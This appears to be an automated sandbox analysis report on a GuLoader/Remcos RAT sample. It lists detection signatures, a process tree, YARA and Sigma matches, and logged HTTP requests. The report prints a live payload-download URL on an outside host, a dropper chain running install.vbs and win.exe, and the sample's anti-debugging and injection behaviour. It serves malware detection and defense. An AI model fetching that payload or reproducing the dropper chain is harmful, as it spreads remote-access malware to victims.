Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Trojan.GenericKD.46442270.25635.17664

Overview

General Information

Sample Name:	SecuriteInfo.com.Trojan.GenericKD.46442270.25635.17664 (renamed file extension from 17664 to exe)
Analysis ID:	430707
MD5:	853744502b68e50e6cbaf81ffb3f5cc0
SHA1:	ea748baebe70d7c6d3da9d1a2a34b76051425962
SHA256:	8115607710c35c78eda8dd16d73cab92e2c857d8c91eb1422fcc1b3f06835a4a
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

GuLoader Remcos

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected GuLoader

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Sigma detected: WScript or CScript Dropper

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe (PID: 6696 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)

SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe (PID: 7080 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)

wscript.exe (PID: 6480 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 6884 cmdline: 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

win.exe (PID: 5128 cmdline: C:\Users\user\AppData\Roaming\win.exe MD5: 853744502B68E50E6CBAF81FFB3F5CC0)

win.exe (PID: 2796 cmdline: C:\Users\user\AppData\Roaming\win.exe MD5: 853744502B68E50E6CBAF81FFB3F5CC0)

backgroundTaskHost.exe (PID: 7080 cmdline: 'C:\Windows\system32\backgroundTaskHost.exe' -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca MD5: B7FC4A29431D4F795BBAB1FB182B759A)

win.exe (PID: 5844 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)

win.exe (PID: 5604 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)

win.exe (PID: 5852 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)

win.exe (PID: 5544 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bin"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000004.00000000.383895844.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000012.00000002.644122683.00000000020B0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000016.00000002.660151221.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000011.00000002.603499845.00000000007A0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000018.00000000.596745893.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000010.00000002.613714696.00000000020B0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000016.00000000.566291257.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000017.00000000.566645906.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000018.00000002.679457919.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: win.exe PID: 2796	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Click to see the 7 entries

Sigma Overview

System Summary:

Sigma detected: WScript or CScript Dropper

Show sources

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe' , ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, ParentProcessId: 7080, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , ProcessId: 6480

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bin"}

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: win.exe PID: 2796, type: MEMORY

Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bin

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: global traffic	HTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache

Source: C:\Users\user\AppData\Roaming\win.exe

Code function: 24_2_005698CB LoadLibraryA,InternetReadFile,

24_2_005698CB

Source: global traffic	HTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: ztechinternational.com

Source: win.exe, 00000016.00000002.660151221.0000000000560000.00000040.00000001.sdmp, win.exe, 00000018.00000002.679457919.0000000000560000.00000040.00000001.sdmp

String found in binary or memory: http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bin

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: win.exe PID: 2796, type: MEMORY

System Summary:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B9417 NtProtectVirtualMemory,	0_2_020B9417
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,	0_2_020B0CBA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5CB3 NtAllocateVirtualMemory,	0_2_020B5CB3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B98CB LoadLibraryA,NtResumeThread,	0_2_020B98CB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B1D2E NtWriteVirtualMemory,LoadLibraryA,	0_2_020B1D2E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B9A03 NtResumeThread,	0_2_020B9A03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B9A2F NtResumeThread,	0_2_020B9A2F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4A27 NtWriteVirtualMemory,	0_2_020B4A27
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4638 NtWriteVirtualMemory,	0_2_020B4638
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3E30 NtWriteVirtualMemory,	0_2_020B3E30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5230 NtWriteVirtualMemory,	0_2_020B5230
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4E36 NtWriteVirtualMemory,	0_2_020B4E36
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B9A41 NtResumeThread,	0_2_020B9A41
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5E47 NtAllocateVirtualMemory,	0_2_020B5E47
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B9A57 NtResumeThread,	0_2_020B9A57
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B7E78 NtWriteVirtualMemory,	0_2_020B7E78
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4A73 NtWriteVirtualMemory,	0_2_020B4A73
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B9A74 NtResumeThread,	0_2_020B9A74
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B528D NtWriteVirtualMemory,	0_2_020B528D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4A87 NtWriteVirtualMemory,	0_2_020B4A87
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4E99 NtWriteVirtualMemory,	0_2_020B4E99
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B9A95 NtResumeThread,	0_2_020B9A95
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4694 NtWriteVirtualMemory,	0_2_020B4694
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5EA8 NtAllocateVirtualMemory,	0_2_020B5EA8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B9AAF NtResumeThread,	0_2_020B9AAF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4AA0 NtWriteVirtualMemory,	0_2_020B4AA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B46D3 NtWriteVirtualMemory,	0_2_020B46D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B1ED7 NtWriteVirtualMemory,	0_2_020B1ED7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B9AEC NtResumeThread,	0_2_020B9AEC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2B01 NtWriteVirtualMemory,	0_2_020B2B01
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4B00 NtWriteVirtualMemory,	0_2_020B4B00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4F14 NtWriteVirtualMemory,	0_2_020B4F14
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4B2D NtWriteVirtualMemory,	0_2_020B4B2D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4B25 NtWriteVirtualMemory,	0_2_020B4B25
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2F3E NtWriteVirtualMemory,LoadLibraryA,	0_2_020B2F3E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B9B4B NtResumeThread,	0_2_020B9B4B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4B5C NtWriteVirtualMemory,	0_2_020B4B5C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4F8C NtWriteVirtualMemory,	0_2_020B4F8C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B9B83 NtResumeThread,	0_2_020B9B83
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4797 NtWriteVirtualMemory,	0_2_020B4797
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4FB8 NtWriteVirtualMemory,	0_2_020B4FB8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8BBE NtWriteVirtualMemory,	0_2_020B8BBE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4BB0 NtWriteVirtualMemory,	0_2_020B4BB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B9BCB NtResumeThread,	0_2_020B9BCB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B93CD NtProtectVirtualMemory,	0_2_020B93CD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B47F4 NtWriteVirtualMemory,	0_2_020B47F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4C16 NtWriteVirtualMemory,	0_2_020B4C16
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B9C14 NtResumeThread,	0_2_020B9C14
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5023 NtWriteVirtualMemory,	0_2_020B5023
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4847 NtWriteVirtualMemory,	0_2_020B4847
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4C68 NtWriteVirtualMemory,	0_2_020B4C68
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B506F NtWriteVirtualMemory,	0_2_020B506F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4899 NtWriteVirtualMemory,	0_2_020B4899
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B44CF NtWriteVirtualMemory,	0_2_020B44CF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B50C5 NtWriteVirtualMemory,	0_2_020B50C5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5CD9 NtAllocateVirtualMemory,	0_2_020B5CD9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B98D8 NtResumeThread,	0_2_020B98D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B48E3 NtWriteVirtualMemory,	0_2_020B48E3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4CE4 NtWriteVirtualMemory,	0_2_020B4CE4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5CE4 NtAllocateVirtualMemory,	0_2_020B5CE4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B60FA NtWriteVirtualMemory,	0_2_020B60FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B28FE NtWriteVirtualMemory,LoadLibraryA,	0_2_020B28FE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B98F3 NtResumeThread,	0_2_020B98F3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4D2A NtWriteVirtualMemory,	0_2_020B4D2A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5D21 NtAllocateVirtualMemory,	0_2_020B5D21
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4520 NtWriteVirtualMemory,	0_2_020B4520
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B9933 NtResumeThread,	0_2_020B9933
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4948 NtWriteVirtualMemory,	0_2_020B4948
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5146 NtWriteVirtualMemory,	0_2_020B5146
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B995D NtResumeThread,	0_2_020B995D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B9951 NtResumeThread,	0_2_020B9951
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B996E NtResumeThread,	0_2_020B996E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5D71 NtAllocateVirtualMemory,	0_2_020B5D71
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4570 NtWriteVirtualMemory,	0_2_020B4570
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B518F NtWriteVirtualMemory,	0_2_020B518F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4D83 NtWriteVirtualMemory,	0_2_020B4D83
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4985 NtWriteVirtualMemory,	0_2_020B4985
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B999B NtResumeThread,	0_2_020B999B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5D90 NtAllocateVirtualMemory,	0_2_020B5D90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5DAD NtAllocateVirtualMemory,	0_2_020B5DAD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B45B5 NtWriteVirtualMemory,	0_2_020B45B5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B51C7 NtWriteVirtualMemory,	0_2_020B51C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4DE9 NtWriteVirtualMemory,	0_2_020B4DE9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5DE9 NtAllocateVirtualMemory,	0_2_020B5DE9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B99E9 NtResumeThread,	0_2_020B99E9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B45E0 NtWriteVirtualMemory,	0_2_020B45E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B45E4 NtWriteVirtualMemory,	0_2_020B45E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B45F9 NtWriteVirtualMemory,	0_2_020B45F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B49F4 NtWriteVirtualMemory,	0_2_020B49F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B9417 NtProtectVirtualMemory,	16_2_020B9417
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,	16_2_020B0CBA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5CB3 NtAllocateVirtualMemory,	16_2_020B5CB3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B98CB LoadLibraryA,NtUnmapViewOfSection,	16_2_020B98CB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B1D2E NtWriteVirtualMemory,LoadLibraryA,	16_2_020B1D2E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B9A03 NtUnmapViewOfSection,	16_2_020B9A03
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B9A2F NtUnmapViewOfSection,	16_2_020B9A2F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4A27 NtWriteVirtualMemory,	16_2_020B4A27
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4638 NtWriteVirtualMemory,	16_2_020B4638
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3E30 NtWriteVirtualMemory,	16_2_020B3E30
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5230 NtWriteVirtualMemory,	16_2_020B5230
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4E36 NtWriteVirtualMemory,	16_2_020B4E36
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B9A41 NtUnmapViewOfSection,	16_2_020B9A41
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5E47 NtAllocateVirtualMemory,	16_2_020B5E47
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B9A57 NtUnmapViewOfSection,	16_2_020B9A57
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B7E78 NtWriteVirtualMemory,	16_2_020B7E78
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4A73 NtWriteVirtualMemory,	16_2_020B4A73
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B9A74 NtUnmapViewOfSection,	16_2_020B9A74
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B528D NtWriteVirtualMemory,	16_2_020B528D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4A87 NtWriteVirtualMemory,	16_2_020B4A87
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4E99 NtWriteVirtualMemory,	16_2_020B4E99
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B9A95 NtUnmapViewOfSection,	16_2_020B9A95
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4694 NtWriteVirtualMemory,	16_2_020B4694
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5EA8 NtAllocateVirtualMemory,	16_2_020B5EA8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B9AAF NtUnmapViewOfSection,	16_2_020B9AAF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4AA0 NtWriteVirtualMemory,	16_2_020B4AA0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B46D3 NtWriteVirtualMemory,	16_2_020B46D3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B1ED7 NtWriteVirtualMemory,	16_2_020B1ED7
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B9AEC NtUnmapViewOfSection,	16_2_020B9AEC
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2B01 NtWriteVirtualMemory,	16_2_020B2B01
